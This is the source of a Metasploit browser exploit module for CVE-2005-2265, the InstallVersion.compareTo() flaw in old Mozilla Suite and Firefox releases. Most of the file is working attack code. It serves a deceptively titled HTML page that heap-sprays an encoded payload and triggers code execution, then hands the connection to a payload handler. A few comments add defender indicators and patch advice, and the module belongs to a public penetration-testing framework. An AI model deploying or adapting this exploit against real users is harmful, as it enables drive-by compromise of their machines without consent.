GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/mozilla_compareto.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
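# Metasploit browser exploit module for CVE-2005-2265 (MFSA 2005-50), the
# InstallVersion.compareTo() flaw in Mozilla Suite / Firefox.
#
# The module runs an HTTP server and answers each request to its URI with one
# HTML page: a heap spray of the encoded payload followed by a compareTo()
# call on an InstallVersion object with a crafted Number argument.
#
# Defender notes:
# * A single target is defined: x86 Windows running the browser releases named
#   in the target label below. Updating to a release the referenced advisory
#   lists as fixed removes the exposure.
# * The served markup is fixed text apart from the encoded payload and the
#   output of js_heap_spray, so the page title, the InstallVersion / compareTo
#   sequence and the 0x0c0c0c0c literal are usable content indicators when
#   reviewing proxy or IDS captures.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # BrowserAutopwn registration is disabled; the block is kept for reference.
  # NOTE(review): the range below treats Mozilla 1.7.10 as affected, while the
  # target label in #initialize reads "Mozilla < 1.7.10". Confirm the fixed
  # release against the advisory in 'References' before relying on either.
  #include Msf::Exploit::Remote::BrowserAutopwn
  # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10
  # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.
  #autopwn_info({
  # :ua_name => HttpClients::FF,
  # :ua_minver => "1.0",
  # :ua_maxver => "1.7.10",
  # :os_name => OperatingSystems::Match::WINDOWS,
  # :javascript => true,
  # :rank => NormalRanking, # reliable memory corruption
  # :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
  #})

  # Registers the module metadata (name, references, payload constraints and
  # the single target) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Mozilla Suite/Firefox compareTo() Code Execution',
      'Description' => %q{
This module exploits a code execution vulnerability in the Mozilla
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
module is a direct port of Aviv Raff's HTML PoC.
},
      'License' => MSF_LICENSE,
      'Author' => ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],
      'References' =>
        [
          ['CVE', '2005-2265'],
          ['OSVDB', '17968'],
          ['BID', '14242'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
        ],
      # Payload constraints: at most 400 bytes, no NUL byte.
      'Payload' =>
        {
          'Space' => 400,
          'BadChars' => "\x00",
        },
      'Platform' => %w{ win },
      'Targets' =>
        [
          # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
          # WinXP-SP3 and Win2kAS-SP0
          [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              # Read as target.ret in #generate_html, where it is passed to
              # sprayHeap and assigned to eaxAddress.
              'Ret' => 0x0c0c0c0c,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2005-07-13'
    ))
  end

  # Serves the page to one connecting client.
  #
  # The request itself is not inspected, so every requester of the module URI
  # receives the same page.
  #
  # @param cli [Object] client connection handed over by the HTTP server mixin
  # @param request [Object] incoming HTTP request (unused)
  # @return [void]
  def on_request_uri(cli, request)
    # Re-generate the payload for this client; stop quietly if none is produced.
    payload = regenerate_payload(cli)
    return if payload.nil?

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(payload), { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

  # Builds the HTML document returned by #on_request_uri.
  #
  # @param payload [#encoded] generated payload; its encoded bytes are embedded
  #   in the page as the argument of a JavaScript unescape() call
  # @return [String] the complete HTML page
  def generate_html(payload)
    byte_order = Rex::Arch.endian(target.arch)
    enc_code = Rex::Text.to_unescape(payload.encoded, byte_order)

    # target.ret rendered as a hex literal for the script below.
    eax_address = sprintf("0x%.8x", target.ret)

    %Q|
<html>
<head>
<!--
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
Greets: SkyLined, The Insider and shutdown
-->
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};

#{js_heap_spray}
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Payload - Just return..
var payLoadCode=unescape("#{enc_code}");

// Size of the heap blocks
var heapBlockSize=0x400000;
sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));

// Set address to fake "pdata".
var eaxAddress = #{eax_address};

// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
// -->
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
|
  end
end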